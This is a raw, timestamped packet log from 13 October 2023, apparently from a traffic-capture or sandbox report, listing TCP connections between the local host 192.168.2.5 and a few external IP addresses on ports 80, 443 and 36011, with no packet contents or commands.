Oct 13, 2023 15:21:16.818563938 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818600893 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818646908 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818706036 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818738937 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818794012 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818809986 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818841934 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818907976 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818945885 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.818978071 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.818995953 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819065094 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819101095 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819139957 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819217920 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819257975 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819279909 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819336891 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819370031 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819387913 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819449902 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819480896 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819497108 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819576979 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819610119 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819633961 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819698095 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819734097 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819772005 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819816113 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819849014 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.819874048 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819937944 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.819969893 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820008039 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820060015 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820096970 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820137024 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820219040 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820252895 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820257902 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820295095 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820344925 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820431948 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820449114 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820507050 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820516109 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820525885 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820545912 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820560932 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820626974 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820672035 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820713997 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820825100 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820868015 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.820890903 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820947886 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820965052 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.820988894 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.821027994 CEST	80	49741	171.22.28.219	192.168.2.5
Oct 13, 2023 15:21:16.821070910 CEST	49741	80	192.168.2.5	171.22.28.219
Oct 13, 2023 15:21:16.821074009 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:16.821218014 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:16.888607025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.888617039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.888643980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.888681889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.888715029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.888731003 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.888765097 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.890393972 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.890413046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.890451908 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.890461922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.890475988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.890506983 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.892173052 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.892191887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.892230034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.892237902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.892251015 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.892276049 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.893706083 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.893726110 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.893764019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.893771887 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.893786907 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.893810987 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.895437956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.895457029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.895493984 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.895502090 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.895524025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.895535946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.897048950 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.897068977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.897099972 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.897108078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.897121906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.897147894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.899326086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.899347067 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.899377108 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.899385929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.899400949 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.899427891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.902317047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.902335882 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.902370930 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.902379036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.902393103 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.902416945 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.904398918 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.904417038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.904454947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.904464006 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.904479027 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.904503107 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.906136990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.906157017 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.906189919 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.906204939 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.906223059 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.906241894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.908164024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.908181906 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.908214092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.908222914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.908237934 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.908260107 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.911298037 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.911317110 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.911346912 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.911355972 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.911371946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.911398888 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.914058924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.914077044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.914112091 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.914122105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.914138079 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.914160013 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.915719986 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.915736914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.915776968 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.915786028 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.915801048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.915827036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.917449951 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.917476892 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.917501926 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.917510033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.917524099 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.917542934 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.919118881 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.919140100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.919176102 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.919186115 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.919198990 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.919222116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.921328068 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.921348095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.921376944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.921385050 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.921399117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.921423912 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.923454046 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.923471928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.923511028 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.923517942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.923532963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.923558950 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.925534964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.925554991 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.925604105 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.925611973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.925627947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.925649881 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.927304983 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.927325010 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.927387953 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.927396059 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.927437067 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.929229975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.929249048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.929284096 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.929291010 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.929305077 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.929331064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.931026936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.931046009 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.931099892 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.931107998 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.931138039 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.931171894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.933815956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.933832884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.933871031 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.933876991 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.933890104 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.933918953 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.937787056 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.937804937 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.937964916 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.937964916 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.937997103 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.938046932 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.939501047 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.939518929 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.939558029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.939567089 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.939584017 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.939608097 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.941513062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.941531897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.941597939 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.941610098 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.941646099 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.943236113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.943253994 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.943285942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.943293095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.943305969 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.943329096 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.945063114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.945080996 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.945110083 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.945116997 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.945132971 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.945156097 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.946865082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.946883917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.946919918 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.946928024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.946943998 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.946966887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.949462891 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.949490070 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.949532032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.949538946 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.949558020 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.949572086 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.952210903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.952229977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.952264071 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.952296019 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.952313900 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.952337980 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.954416037 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.954442978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.954471111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.954483032 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.954500914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.954519033 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.957380056 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.957397938 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.957433939 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.957443953 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.957464933 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.957485914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.958961964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.958980083 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.959014893 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.959022999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.959038973 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.959064007 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.960568905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.960589886 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.960625887 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.960633039 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.960648060 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.960670948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.962492943 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.962512016 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.962547064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.962555885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.962583065 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.962594032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.964247942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.964267015 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.964298964 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.964307070 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.964323044 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.964349985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.965794086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.965811968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.965850115 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.965858936 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.965872049 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.965895891 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.967900038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.967917919 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.967950106 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.967957973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.967969894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.967995882 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.969779968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.969799042 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.969836950 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.969845057 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.969862938 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.969882965 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.973553896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.973572016 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.973608017 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.973617077 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.973634005 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.973660946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.976671934 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.976691008 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.976727962 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.976736069 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.976749897 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.976773977 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.980181932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.980199099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.980349064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.980349064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.980380058 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.980432034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.982182026 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.982199907 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.982238054 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.982249022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.982264996 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.982286930 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.983987093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.984045029 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.984052896 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.984062910 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:16.984091043 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:16.984107971 CEST	49736	443	192.168.2.5	45.130.41.106
